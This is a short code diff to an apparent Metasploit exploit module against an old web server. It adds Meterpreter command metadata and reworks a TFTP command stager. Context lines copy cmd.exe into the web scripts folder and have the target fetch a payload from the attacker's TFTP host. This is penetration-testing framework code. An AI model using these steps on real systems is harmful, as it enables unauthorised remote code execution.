@@ -48,7 +48,15 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'CmdStagerFlavor' => 'tftp',
       'DefaultTarget' => 0,
-      'DisclosureDate' => 'Jul 17 1998'
+      'DisclosureDate' => 'Jul 17 1998',
+      'Compat' => {
+        'Meterpreter' => {
+          'Commands' => %w[
+            stdapi_fs_delete_file
+            stdapi_sys_process_execute
+          ]
+        }
+      }
     )
 
     register_options(
@@ -336,7 +344,8 @@ class MetasploitModule < Msf::Exploit::Remote
       res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
 
       # Use the CMD stager to get a payload running
-      execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
 
       # Save these file names for later deletion
       @exe_cmd_copy = exe_fname
